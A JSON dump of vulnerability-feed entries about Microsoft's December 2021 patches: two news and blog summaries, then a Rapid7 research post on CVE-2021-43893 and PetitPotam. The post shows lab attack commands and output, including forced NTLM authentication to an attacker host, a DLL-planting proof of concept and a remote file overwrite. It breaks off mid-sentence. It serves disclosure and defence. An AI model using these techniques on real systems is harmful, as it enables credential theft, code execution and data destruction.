interesting, but the real exploitability is questionable.\n\n**Remote Code Execution in Windows Remote Desktop Client (CVE-2021-43233)**. "Microsoft rated this \u201cExploitation More Likely.\u201d Exploiting this flaw would require a vulnerable target to connect to a malicious RDP server. Successful exploitation would allow an attacker to execute arbitrary code on the machine of the connected client."\n\n**Remote Code Execution in Microsoft SharePoint (CVE-2021-42309)**. "The vulnerability allows a user to elevate and execute code in the context of the service account. An attacker would need \u201cManage Lists\u201d permissions on a SharePoint site, but by default, any authorized user can create their own new site where they have full permissions. This bug allows an attacker to bypass the restriction against running arbitrary server-side web controls."\n\n**Remote Code Execution in Microsoft Office (CVE-2021-43905)**. "To exploit this vulnerability, an attacker would have to create a malicious Microsoft Office document and convince a user through social engineering to open the document. Microsoft says that the Preview Pane is not an attack vector, which means exploitation requires opening the document, not merely previewing it."\n\nAnd this one is my favorite. **Remote Code Execution in Microsoft 4K Wireless Display Adapter**. Microsoft is not only a software vendor. Sometimes they also have vulnerabilities in their hardware. "This update fixes a vulnerability that could allow an unauthenticated attacker to execute their code on an affected device. The attacker would need to be on the same network as the Microsoft 4K Display Adapter. If they are, they could send specially crafted packets to the affected device. Patching this won\u2019t be an easy chore. To be protected, users need to install the Microsoft Wireless Display Adapter application from the Microsoft Store onto a system connected to the Microsoft 4K Wireless Display Adapter. Only then can the use the \u201cUpdate & Security\u201d section of the app to download the latest firmware to mitigate this bug."\n\nYet another **Elevation of Privilege in Windows Print Spooler (CVE-2021-41333)**. \u201cExploitation More Likely\u201d. "Given the mass exploitation of prior Print Spooler vulnerabilities, users should apply these patches as soon as possible."\n\n**Elevation of Privilege in Windows Installer (CVE-2021-43883)**. "To exploit this vulnerability, an attacker would need to convince the target to open a specially crafted installer in order to gain elevated privileges."\n\nFinally, I would like to note the **Memory Corruption in Microsoft Edge (CVE-2021-4102)**. This is a very low priority vulnerability. However, the description has "Google is aware of reports that an exploit for CVE-2021-4102 exists in the wild." However, for some reason Microsoft does not specify exploitability in the wild for this vulnerability, as they do it for their other vulnerabilities. It's a pity.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-16T20:53:37", "type": "avleonov", "title": "Microsoft Patch Tuesday December 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4102", "CVE-2021-41333", "CVE-2021-42309", "CVE-2021-43215", "CVE-2021-43217", "CVE-2021-43233", "CVE-2021-43883", "CVE-2021-43890", "CVE-2021-43905"], "modified": "2021-12-16T20:53:37", "id": "AVLEONOV:B6F052DA6F44A6D3C449552BB1B53A9A", "href": "https://avleonov.com/2021/12/16/microsoft-patch-tuesday-december-2021/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2022-05-09T12:37:48", "description": "[![](https://thehackernews.com/new-images/img/a/AVvXsEggnRShNZQz_fEHvob-6EckuO0q1PPn5JpO7fTrdcv6rgtHYNsjEgkP9dP8FIkMyQL9_hbCTYU-Z_7F7DR5a9mLBWdIX4FAUh6mBFAVxvOpJqKYsnr4xaEKpsG-o8jDI4NeiW6o4leQ5hntg7TFy4kxF1R-awgnu8mwYSZhHnV8mGfcNdtps6g-VXJn)](<https://thehackernews.com/new-images/img/a/AVvXsEggnRShNZQz_fEHvob-6EckuO0q1PPn5JpO7fTrdcv6rgtHYNsjEgkP9dP8FIkMyQL9_hbCTYU-Z_7F7DR5a9mLBWdIX4FAUh6mBFAVxvOpJqKYsnr4xaEKpsG-o8jDI4NeiW6o4leQ5hntg7TFy4kxF1R-awgnu8mwYSZhHnV8mGfcNdtps6g-VXJn>)\n\nMicrosoft has rolled out [Patch Tuesday updates](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Dec>) to address multiple security vulnerabilities in Windows and other software, including one actively exploited flaw that's being abused to deliver Emotet, TrickBot, or Bazaloader malware payloads.\n\nThe latest monthly release for December fixes a total of 67 flaws, bringing the total number of bugs patched by the company this year to 887, according to the [Zero Day Initiative](<https://www.zerodayinitiative.com/blog/2021/12/14/the-december-2021-security-update-review>). Seven of the 67 flaws are rated Critical and 60 are rated as Important in severity, with five of the issues publicly known at the time of release. It's worth noting that this is in addition to the [21 flaws](<https://docs.microsoft.com/en-us/deployedge/microsoft-edge-relnotes-security>) resolved in the Chromium-based Microsoft Edge browser.\n\nThe most critical of the lot is [CVE-2021-43890](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43890>) (CVSS score: 7.1), a Windows AppX installer spoofing vulnerability that Microsoft said could be exploited to achieve arbitrary code execution. The lower severity rating is indicative of the fact that code execution hinges on the logged-on user level, meaning \"users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\"\n\nThe Redmond-based tech giant noted that an adversary could leverage the flaw by crafting a malicious attachment that's then used as part of a phishing campaign to trick the recipients into opening the email attachment. Sophos security researchers Andrew Brandt as well as Rick Cole and Nick Carr of the Microsoft Threat Intelligence Center (MSTIC) have been credited with reporting the vulnerability.\n\n\"Microsoft is aware of attacks that attempt to exploit this vulnerability by using specially crafted packages that include the malware family known as Emotet/ Trickbot/ Bazaloader,\" the company further added. The development comes as Emotet malware campaigns are [witnessing a surge in activity](<https://thehackernews.com/2021/12/140000-reasons-why-emotet-is.html>) after more than a 10-month-long hiatus following a coordinated law enforcement effort to disrupt the botnet's reach.\n\nOther flaws that are publicly known are below \u2014\n\n * [**CVE-2021-43240**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43240>) (CVSS score: 7.8) - NTFS Set Short Name Elevation of Privilege Vulnerability\n * [**CVE-2021-43883**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43883>) (CVSS score: 7.8) - Windows Installer Elevation of Privilege Vulnerability\n * [**CVE-2021-41333**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-41333>) (CVSS score: 7.8) - Windows Print Spooler Elevation of Privilege Vulnerability\n * [**CVE-2021-43893**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43893>) (CVSS score: 7.5) - Windows Encrypting File System (EFS) Elevation of Privilege Vulnerability\n * [**CVE-2021-43880**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43880>) (CVSS score: 5.5) - Windows Mobile Device Management Elevation of Privilege Vulnerability\n\nThe December patch also comes with remediations for 10 remote code execution flaws in Defender for IoT, in addition to critical bugs affecting iSNS Server ([CVE-2021-43215](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43215>)), 4K Wireless Display Adapter ([CVE-2021-43899](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43899>)), Visual Studio Code WSL Extension ([CVE-2021-43907](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43907>)), Office app ([CVE-2021-43905](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43905>)), Windows Encrypting File System ([CVE-2021-43217](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43217>)), Remote Desktop Client ([CVE-2021-43233](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43233>)), and SharePoint Server ([CVE-2021-42309](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-42309>)).\n\n### Software Patches From Other Vendors\n\nBesides Microsoft, security updates have also been released by other vendors to rectify several vulnerabilities, including \u2014\n\n * [Adobe](<https://helpx.adobe.com/security.html>)\n * [Android](<https://source.android.com/security/bulletin/2021-12-01>)\n * [Apple](<https://thehackernews.com/2021/12/latest-apple-ios-update-patches-remote.html>)\n * [Cisco](<https://tools.cisco.com/security/center/publicationListing.x>)\n * [Citrix](<https://support.citrix.com/search/#/All%20Products?ct=Software%20Updates,Security%20Bulletins&searchText=&sortBy=Modified%20date&pageIndex=1>)\n * [Intel](<https://www.intel.com/content/www/us/en/security-center/default.html>)\n * Linux distributions [Oracle Linux](<https://linux.oracle.com/ords/f?p=105:21>), [Red Hat](<https://access.redhat.com/security/security-updates/#/security-advisories?q=&p=2&sort=portal_publication_date%20desc&rows=10&portal_advisory_type=Security%20Advisory&documentKind=Errata>), and [SUSE](<https://lists.suse.com/pipermail/sle-security-updates/2021-December/thread.html>)\n * [SAP](<https://wiki.scn.sap.com/wiki/display/PSR/SAP+Security+Patch+Day+-+December+2021>)\n * [Schneider Electric](<https://www.se.com/ww/en/work/support/cybersecurity/security-notifications.jsp>), and\n * [Siemens](<https://new.siemens.com/global/en/products/services/cert.html#SecurityPublications>)\n\nFurthermore, [numerous security advisories](<https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.html>) have been released by dozens of companies for the actively exploited [Log4j remote code execution vulnerability](<https://thehackernews.com/2021/12/extremely-critical-log4j-vulnerability.html>) that could allow a complete takeover of affected systems.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-15T07:14:00", "type": "thn", "title": "Microsoft Issues Windows Update to Patch 0-Day Used to Spread Emotet Malware", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41333", "CVE-2021-42309", "CVE-2021-43215", "CVE-2021-43217", "CVE-2021-43233", "CVE-2021-43240", "CVE-2021-43880", "CVE-2021-43883", "CVE-2021-43890", "CVE-2021-43893", "CVE-2021-43899", "CVE-2021-43905", "CVE-2021-43907"], "modified": "2021-12-16T04:32:45", "id": "THN:A12549603E494D035DF4BABEC04EBD5D", "href": "https://thehackernews.com/2021/12/microsoft-issues-windows-update-to.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "rapid7blog": [{"lastseen": "2022-02-14T17:27:53", "description": "![Dropping Files on a Domain Controller Using CVE-2021-43893](https://blog.rapid7.com/content/images/2022/02/dropping-files.jpg)\n\nOn December 14, 2021, during the [Log4Shell](<https://www.rapid7.com/blog/post/2021/12/15/the-everypersons-guide-to-log4shell-cve-2021-44228/>) chaos, Microsoft published [CVE-2021-43893](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43893>), a remote privilege escalation vulnerability affecting the Windows Encrypted File System (EFS). The vulnerability was credited to [James Forshaw](<https://twitter.com/tiraniddo>) of [Google Project Zero](<https://googleprojectzero.blogspot.com/p/about-project-zero.html>), but perhaps owing to the Log4Shell atmosphere, the vulnerability gained little to no attention.\n\nOn January 13, 2022, Forshaw [tweeted](<https://twitter.com/tiraniddo/status/1481633916507209737?s=20&t=P1xWmHiiDap39HipKqbHGg>) about the vulnerability.\n\n![Dropping Files on a Domain Controller Using CVE-2021-43893](https://blog.rapid7.com/content/images/2022/02/image8.png)\n\nThe tweet suggests that CVE-2021-43893 was only issued a partial fix in the December 2021 update and that authenticated and remote users could still write arbitrary files on domain controllers. James linked to the Project Zero [bug tracker](<https://bugs.chromium.org/p/project-zero/issues/detail?id=2228>), where an extended writeup and some proof-of-concept code was stored.\n\nThis vulnerability was of particular interest to me, because I had recently discovered a local privilege escalation (LPE) using file planting in a Windows product. The vulnerable product could reasonably be deployed on a system with unconstrained delegation, which meant I could use CVE-2021-43893 to remotely plant the file as a low-privileged _remote_ user, turning my LPE into RCE.\n\nI set out to investigate if the remote file-writing aspect of James Forshaw\u2019s bug was truly unpatched. The investigation resulted in a few interesting observations:\n\n * Low-privileged user remote file-writing was patched in the December update. However, before the December update, a remote low-privileged user really could write arbitrary files on system-assigned unconstrained delegation.\n * Forced authentication and relaying are still not completely patched. Relay attacks initiated on the `efsrpc` named pipe have been known since inclusion in [PetitPotam](<https://github.com/topotam/PetitPotam>) in [July 2021](<https://github.com/topotam/PetitPotam/commit/d3a3e0ccbe22432a30509df3551a7766bb89f706>). The issue seems to persist despite multiple patch attempts.\n\nAlthough the file upload aspect of this vulnerability has been patched, I found the vulnerability quite interesting. The vulnerability is certainly limited by the restrictions on where a low-privileged user can create files on a Domain Controller, and maybe that is why the vulnerability didn\u2019t receive more attention. But as I touched upon, it can be paired with a local vulnerability to achieve remote code execution, and as such, I thought it deserved more attention. I also have found the failure to properly patch forced authentication over the [EFSRPC](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31>) protocol to be worthy of more examination.\n\n## Inadequate EFSPRC forced authentication patching: A brief history of PetitPotam\n\nPetitPotam was released in the summer of 2021 and was widely associated with an [attack chain](<https://www.truesec.com/hub/blog/from-stranger-to-da-using-petitpotam-to-ntlm-relay-to-active-directory>) that starts as an unauthenticated and remote attacker and ends with domain administrator privileges. PetitPotam is **only** the beginning of that chain. It allows an attacker to force a victim Windows computer to authenticate to a third party (e.g. [MITRE ATT&CK T118 - forced authentication](<https://attack.mitre.org/techniques/T1187/>)). The full chain is interesting, but this discussion is only interested in the initial portion triggered by PetitPotam.\n\nPetitPotam triggers forced authentication using the EFSRPC protocol. The original implementation of the exploit performed the attack over the `lsarpc` named pipe. The attack is quite simple. Originally, PetitPotam sent the victim server an [`EfsRpcOpenFileRaw`](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/ccc4fb75-1c86-41d7-bbc4-b278ec13bfb8>) request containing a [UNC file path](<https://docs.microsoft.com/en-us/dotnet/standard/io/file-path-formats>). Using a UNC path such as `\\\\10.0.0.4\\fake_share\\fake_file` forces the victim server to reach out to the third-party server, 10.0.0.4 in this example, in order to read off of the desired file share. The third-party server can then tell the victim to authenticate in order to access the share, and the victim obliges. The result is the victim leaks their Net-NTLM hash. That\u2019s the whole thing. We will later touch on what an attacker can do with this hash, but for this section, that\u2019s all we need to know.\n\nMicrosoft first attempted to patch the EFSRPC forced authentication in August 2021 by blocking the use of `EfsRpcOpenFileRaw` over the `lsarpc` named pipe. To do this, they added logic to `efslsaext.dll`\u2019s `EfsRpcOpenFileRaw_Downllevel` function to check for a value stored in the `HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EFS\\AllowOpenRawDL`. Because this registry key doesn\u2019t exist by default, a typical configuration will always fail this check.\n\n![Dropping Files on a Domain Controller Using CVE-2021-43893](https://blog.rapid7.com/content/images/2022/02/image10.png)\n\nThat patch was inadequate, because `EfsRpcOpenFileRaw` isn\u2019t the only EFSRPC function that accepts a UNC file path as a parameter. PetitPotam was quickly [updated](<https://github.com/topotam/PetitPotam/commit/ea66c3f141b1ce3f97865518c87a9b53ebecdb7a>) to use `EfsRpcEncryptFileSrv`, and just like that, the patch was bypassed.\n\nThe patch also failed to recognize that the `lsarpc` named pipe wasn\u2019t the only named pipe that EFSRPC can be executed over. The [`efsrpc`](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/403c7ae0-1a3a-4e96-8efc-54e79a2cc451>) named pipe (among others) can also be used. `efsrpc` named pipe is slightly less desirable, since it requires the attacker to be authenticated, but the attack works over that pipe, **and** it doesn\u2019t use the `EfsRpcOpenFileRaw_Downlevel` function. That means an attacker can also bypass the patch by switching named pipes.\n\nAs mentioned earlier, PetitPotam was updated in July 2021 to use the `efsrpc` named pipe. The following output shows PetitPotam forcing a Domain Controller patched through November 2021 to authenticate with an attacker controlled box running Responder.py (10.0.0.6) (I\u2019ve left out the Responder bit since this is just meant to highlight the EFSRPC was available and unpatched for months).\n \n \n albinolobster@ubuntu:~/impacket/examples$ python3 petitpotam.py -pipe efsr -u 'lowlevel' -p \u2018cheesed00dle!' -d okhuman.ninja 10.0.0.6 10.0.0.5 \n \n \n ___ _ _ _ ___ _ \n | _ \\ ___ | |_ (_) | |_ | _ \\ ___ | |_ __ _ _ __ \n | _/ / -_) | _| | | | _| | _/ / _ \\ | _| / _` | | ' \\ \n _|_|_ \\___| _\\__| _|_|_ _\\__| _|_|_ \\___/ _\\__| \\__,_| |_|_|_| \n _| \"\"\" |_|\"\"\"\"\"|_|\"\"\"\"\"|_|\"\"\"\"\"|_|\"\"\"\"\"|_| \"\"\" |_|\"\"\"\"\"|_|\"\"\"\"\"|_|\"\"\"\"\"|_|\"\"\"\"\"| \n \"`-0-0-'\"`-0-0-'\"`-0-0-'\"`-0-0-'\"`-0-0-'\"`-0-0-'\"`-0-0-'\"`-0-0-'\"`-0-0-'\"`-0-0-' \n \n PoC to elicit machine account authentication via some MS-EFSRPC functions\n by topotam (@topotam77)\n \n Inspired by @tifkin_ & @elad_shamir previous work on MS-RPRN\n \n \n \n [-] Connecting to ncacn_np:10.0.0.5[\\PIPE\\efsrpc]\n [+] Connected!\n [+] Binding to df1941c5-fe89-4e79-bf10-463657acf44d\n [+] Successfully bound!\n [-] Sending EfsRpcOpenFileRaw!\n [+] Got expected ERROR_BAD_NETPATH exception!!\n [+] Attack worked!\n \n\nNot only did Microsoft fail to patch the issue, but they didn\u2019t issue follow-up patches for months. They also haven\u2019t updated their advisory indicating the vulnerability has been exploited in the wild, despite its inclusion in CISA\u2019s [Known Exploited Vulnerability Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>).\n\n![Dropping Files on a Domain Controller Using CVE-2021-43893](https://blog.rapid7.com/content/images/2022/02/image6-1.png)\n\nIn December 2021, Microsoft released a patch for a different EFSRPC vulnerability: [CVE-2021-43217](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43217>). As part of the remediation for that issue, [Microsoft implemented](<https://support.microsoft.com/en-au/topic/kb5009763-efs-security-hardening-changes-in-cve-2021-43217-719fbc9d-ad9b-4f90-a964-0afe40338002>) some hardening measures on EFSRPC communication. In particular, EFSRPC clients would need to use [`RPC_C_AUTHN_LEVEL_PKT_PRIVACY`](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rpce/425a7c53-c33a-4868-8e5b-2a850d40dc73>) when using EFSRPC. If the client fails to do so, then the client is rejected and a Windows application event is generated.\n\n![Dropping Files on a Domain Controller Using CVE-2021-43893](https://blog.rapid7.com/content/images/2022/02/image1-2.png)\n\nAt the time of the December patch, PetitPotam didn\u2019t use this specific setting. However, a quick [update](<https://github.com/topotam/PetitPotam/commit/c3accf0875729ffabac13692841e0a671f96d0f2>) allowed the exploit to comply with the new requirement and get back to leaking machine account NTLM hashes of fully patched Windows machines.\n\n## CVE-2021-43893: Windows EFS remote file upload\n\nJames Forshaw\u2019s CVE-2021-43893 dives deeper into the EFSRPC functionality, but the heart of the issue is still a UNC file path problem. PetitPotam\u2019s UNC path pointed to an external server, but CVE-2021-43893 points internally using the UNC path: `\\\\.\\C:\\`. Using a UNC path that points to the victim\u2019s local file system allows attackers to create files and directories on the victim file system.\n\nThere are two major caveats to this vulnerability. First, the file-writing aspect of this vulnerability only appears to work on systems with unconstrained delegation. That\u2019s fine if you are only interested in Domain Controllers, but less good if you are only interested in workstations.\n\nSecond, the victim server is impersonating the attacker when the file manipulation occurs. This means a low-privileged attacker can only write to the places where they have permission (e.g. `C:\\ProgramData\\`). Therefore, exploitation resulting in code execution is not a given. Still, while code execution isn\u2019t guaranteed, there are many plausible scenarios that could lead there.\n\n### A plausible scenario leading to RCE using CVE-2021-43893\n\nMy interest in this vulnerability started with a local privilege escalation that I wanted to convert into remote code execution as a higher-privileged user. We can\u2019t yet share the LPE as it\u2019s still unpatched, but we can create a plausible scenario that demonstrates the ability to achieve code execution.\n\nMicrosoft has long maintained that Microsoft services vulnerable to [DLL planting](<https://itm4n.github.io/windows-dll-hijacking-clarified/>) via a world writable `%PATH%` directory are **[won\u2019t-fix](<https://msrc-blog.microsoft.com/2018/04/04/triaging-a-dll-planting-vulnerability/>)** low-security issues \u2014 a weird position given the effort it would take to fix such issues. But regardless, exploiting world-writable `%PATH` to escalate privileges via a Windows service ([MITRE ATT&CK - Hijack Execution Flow: DLL Search Order Hijacking](<https://attack.mitre.org/techniques/T1574/001/>)) is a useful technique when it\u2019s [available](<https://github.com/rapid7/metasploit-framework/blob/1499b1988e0f6c6cb541e715cf7a3dc43d5563f3/modules/exploits/windows/local/srclient_dll_hijacking.rb>).\n\nThere\u2019s a well-known product that installs itself into a world-writable directory: [Python 2.7](<https://www.python.org/downloads/release/python-2718/>), all the way through it\u2019s final release 2.7.18.\n \n \n C:\\Users\\administrator>icacls.exe C:\\Python27\\\n C:\\Python27\\ NT AUTHORITY\\SYSTEM:(I)(OI)(CI)(F)\n BUILTIN\\Administrators:(I)(OI)(CI)(F)\n BUILTIN\\Users:(I)(OI)(CI)(RX)\n BUILTIN\\Users:(I)(CI)(AD)\n BUILTIN\\Users:(I)(CI)(WD)\n CREATOR OWNER:(I)(OI)(CI)(IO)(F)\n \n Successfully processed 1 files; Failed processing 0 files\n \n\nThe Python 2.7 installer drops files into `C:\\Python27\\` and provides the user with the following instructions:\n \n \n Besides using the automatically created start menu entry for the Python interpreter, you might want to start Python in the DOS prompt. To make this work, you need to set your %PATH% environment variable to include the directory of your Python distribution, delimited by a semicolon from other entries. An example variable could look like this (assuming the first two entries are Windows\u2019 default):\n \n C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\Python25\n \n Typing python on your command prompt will now fire up the Python interpreter. Thus, you can also execute your scripts with command line options, see Command line documentation.\n \n\nFollowing these instructions, we now have a world-writable directory in `%PATH%` \u2014 which is, of course, the exploitable condition we were looking for. Now we just have to find a Windows service that will search for a missing DLL in `C:\\Python27\\`. I quickly accomplished this task by restarting all the running services on a test Windows Server 2019 and watching [procmon](<https://docs.microsoft.com/en-us/sysinternals/downloads/procmon>). I found a number of services will search `C:\\Python27\\` for:\n\n * fveapi.dll\n * cdpsgshims.dll\n\nTo exploit this, we just need to drop a \u201cmalicious\u201d DLL named `fveapi.dll` or `cdpsgshims.dll` in `C:\\Python27`. The DLL will be loaded when a vulnerable service restarts or the server reboots.\n\nFor this simple example, the \u201cmalicious\u201d dll just creates the file `C:\\r7.txt`:\n \n \n #include <Windows.h>\n \n HANDLE hThread;\n DWORD dwThread;\n \n DWORD WINAPI doCreateFile(LPVOID)\n {\n HANDLE createFile = CreateFileW(L\"C:\\\\r7.txt\", GENERIC_WRITE, NULL, NULL, CREATE_NEW, FILE_ATTRIBUTE_NORMAL, NULL);\n CloseHandle(createFile);\n return 0;\n }\n \n BOOL APIENTRY DllMain( HMODULE, DWORD ul_reason_for_call, LPVOID)\n {\n switch (ul_reason_for_call)\n {\n case DLL_PROCESS_ATTACH:\n hThread = CreateThread(NULL, 0, doCreateFile, NULL, 0, &dwThread);\n break;\n case DLL_THREAD_ATTACH:\n case DLL_THREAD_DETACH:\n case DLL_PROCESS_DETACH:\n break;\n }\n return TRUE;\n }\n \n\nAfter compiling the DLL, an attacker can remotely drop the file into `C:\\Python27` using CVE-2021-43893. The following is the output from our [refactored and updated version](<https://github.com/jbaines-r7/blankspace>) of Forshaw\u2019s original proof of concept. The attacker is attempting to remotely write the DLL on 10.0.0.6 (vulnerable.okhuman.ninja):\n \n \n C:\\ProgramData>whoami\n okhuman\\lowlevel\n \n C:\\ProgramData>.\\blankspace.exe -r vulnerable.okhuman.ninja -f \\\\.\\C:\\Python27\\fveapi.dll -i ./dll_inject64.dll\n ____ ___ __ ____\n /\\ _`\\ /\\_ \\ /\\ \\ /\\ _`\\\n \\ \\ \\L\\ \\//\\ \\ __ ___\\ \\ \\/'\\ \\ \\,\\L\\_\\ _____ __ ___ __\n \\ \\ _ <'\\ \\ \\ /'__`\\ /' _ `\\ \\ , < \\/_\\__ \\ /\\ '__`\\ /'__`\\ /'___\\ /'__`\\\n \\ \\ \\L\\ \\\\_\\ \\_/\\ \\L\\.\\_/\\ \\/\\ \\ \\ \\\\`\\ /\\ \\L\\ \\ \\ \\L\\ \\/\\ \\L\\.\\_/\\ \\__//\\ __/\n \\ \\____//\\____\\ \\__/.\\_\\ \\_\\ \\_\\ \\_\\ \\_\\ \\ `\\____\\ \\ ,__/\\ \\__/.\\_\\ \\____\\ \\____\\\n \\/___/ \\/____/\\/__/\\/_/\\/_/\\/_/\\/_/\\/_/ \\/_____/\\ \\ \\/ \\/__/\\/_/\\/____/\\/____/\n \\ \\_\\\n \\/_/\n [+] Creating EFS RPC binding handle to vulnerable.okhuman.ninja\n [+] Attempting to write to \\\\.\\C:\\Python27\\fveapi.dll\n [+] Encrypt the empty remote file...\n [+] Reading the encrypted remote file object\n [+] Read back 1244 bytes\n [+] Writing 92160 bytes of attacker data to encrypted object::$DATA stream\n [+] Decrypt the the remote file\n [!] Success!\n \n C:\\ProgramData>\n \n\nThe attack yields the desired output, and the file is written to C:\\Python27\\ on the remote target.\n\n![Dropping Files on a Domain Controller Using CVE-2021-43893](https://blog.rapid7.com/content/images/2022/02/image2-1.png)\n\nBelow is the Procmon output demonstrating successful code execution as `NT AUTHORITY\\ SYSTEM` when the \u201cDFS Replication\u201d service is restarted. Note that the malicious DLL is loaded and the file \u201cC:\\r7.txt\u201d is created.\n\n![Dropping Files on a Domain Controller Using CVE-2021-43893](https://blog.rapid7.com/content/images/2022/02/image4-1.png)\n\nDo many administrators install Python 2.7 on their Domain Controller? I hope not. That wasn\u2019t really the point. The point is that exploitation using this technique is plausible and worthy of our collective attention to ensure that it gets patched and monitored for exploitation.\n\n### What can a higher-privileged user do?\n\nOddly, administrators can do anything a low-level user can do except write data to files. When the administrator attempts to write to a file using Forshaw\u2019s ::DATA stream technique, the result is an ACCESS DENIED error. Candidly, I didn\u2019t investigate why.\n\nHowever, it is interesting to note that the administrative user can remotely overwrite all files. This doesn\u2019t serve much purpose from an offensive standpoint, but would serve as an easy, low-effort [wiper](<https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/033/904/original/Talos_WiperWhitepaper.v3.pdf?1525893980>) or data destruction attack. Here is a silly example of remotely overwriting calc.exe from an administrator account.\n \n \n C:\\ProgramData>whoami\n okhuman\\test_admin\n \n C:\\ProgramData>.\\blankspace.exe -r vulnerable.okhuman.ninja -f \\\\.\\C:\\Windows\\System32\\calc.exe -s \"aaaaaaaaaaaa\"\n ____ ___ __ ____\n /\\ _`\\ /\\_ \\ /\\ \\ /\\ _`\\\n \\ \\ \\L\\ \\//\\ \\ __ ___\\ \\ \\/'\\ \\ \\,\\L\\_\\ _____ __ ___ __\n \\ \\ _ <'\\ \\ \\ /'__`\\ /' _ `\\ \\ , < \\/_\\__ \\ /\\ '__`\\ /'__`\\ /'___\\ /'__`\\\n \\ \\ \\L\\ \\\\_\\ \\_/\\ \\L\\.\\_/\\ \\/\\ \\ \\ \\\\`\\ /\\ \\L\\ \\ \\ \\L\\ \\/\\ \\L\\.\\_/\\ \\__//\\ __/\n \\ \\____//\\____\\ \\__/.\\_\\ \\_\\ \\_\\ \\_\\ \\_\\ \\ `\\____\\ \\ ,__/\\ \\__/.\\_\\ \\____\\ \\____\\\n \\/___/ \\/____/\\/__/\\/_/\\/_/\\/_/\\/_/\\/_/ \\/_____/\\ \\ \\/ \\/__/\\/_/\\/____/\\/____/\n \\ \\_\\\n \\/_/\n [+] Creating EFS RPC binding handle to vulnerable.okhuman.ninja\n [+] Attempting to write to \\\\.\\C:\\Windows\\System32\\calc.exe\n [+] Encrypt the empty remote file...\n [-] EfsRpcEncryptFileSrv failed with status code: 5\n \n C:\\ProgramData>\n \n\nAs you can see from the output, the tool failed with status code 5 (Access Denied). However, `calc.exe` on the remote device was successfully overwritten.\n\n![Dropping Files on a Domain Controller Using CVE-2021-43893](https://blog.rapid7.com/content/images/2022/02/image5.png)\n\nTechnically speaking, this doesn\u2019t really represent a security boundary being crossed. Administrators typically have access to \\host\\C$ or \\host\\admin$, but the difference in behavior seemed worth mentioning. I\u2019d also note that as of February 2022, administrative users can still do this using `\\\\localhost\\C$\\Windows\\System32\\calc.exe`.\n\nForshaw also mentioned in his original writeup, and I confirmed, that this attack generates the attacking user\u2019s roaming profile on the victim server. That could be a pretty interesting file-upload vector if the Active Directory environment synchronizes roaming directories. Again, I didn\u2019t investigate that any further, but it could be useful in the correct environment.\n\n### Forced authentication still not entirely patched\n\nThe December 2021 patch 